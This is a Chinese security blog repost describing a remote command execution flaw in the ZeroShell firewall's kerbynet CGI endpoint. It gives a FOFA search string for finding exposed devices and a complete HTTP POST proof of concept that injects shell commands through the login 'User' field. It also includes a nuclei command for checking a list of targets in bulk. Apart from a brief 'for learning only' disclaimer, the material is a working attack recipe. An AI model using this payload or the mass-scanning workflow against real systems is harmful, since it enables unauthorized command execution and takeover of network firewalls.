【新】漏洞复现 ZeroShell kerbynet存在远程命令执行漏洞(另一种方式)

admin 2024年2月23日20:41:58评论14 views字数 1007阅读3分21秒阅读模式

0x01 阅读须知

本文所提供的工具仅用于学习,禁止用于其他!!!

0x02 漏洞描述

Zeroshell是一个微型的linux发行版本,它功能强大,具有强大的router、radius、web门户、防火墙、virtual、Qos、DHCP、dns转发等功能,可以用来安装到服务器上为内网提供网络服务。Zeroshell防火墙统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限。

【新】漏洞复现 ZeroShell kerbynet存在远程命令执行漏洞(另一种方式)

0x03 漏洞复现

fofa:app="Zeroshell-防火墙"

1.使用POC执行id命令,得到回显

POST /cgi-bin/kerbynet HTTP/1.1Host: User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)Content-Length: 365Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflate,brConnection: Keep-aliveContent-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw------------YWJkMTQzNDcwContent-Disposition: form-data; name="Action"StartSessionSubmit------------YWJkMTQzNDcwContent-Disposition: form-data; name="User"echo bgcafo$() baghqnnz^xyu||a #' &echo 12345948~||a #|" &echo bgcafo$() baghqnnz^xyu||a #------------YWJkMTQzNDcwContent-Disposition: form-data; name="PW"------------YWJkMTQzNDcw--

【新】漏洞复现 ZeroShell kerbynet存在远程命令执行漏洞(另一种方式)

2.nuclei批量验证已发表于知识星球

nuclei.exe -t zeroshell-fw-kerbynet-rce.yaml -l subs.txt -stats

【新】漏洞复现 ZeroShell kerbynet存在远程命令执行漏洞(另一种方式)

原文始发于微信公众号(融云攻防实验室):【新】漏洞复现 ZeroShell kerbynet存在远程命令执行漏洞(另一种方式)

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月23日20:41:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【新】漏洞复现 ZeroShell kerbynet存在远程命令执行漏洞(另一种方式)https://cn-sec.com/archives/2115250.html

发表评论

匿名网友 填写信息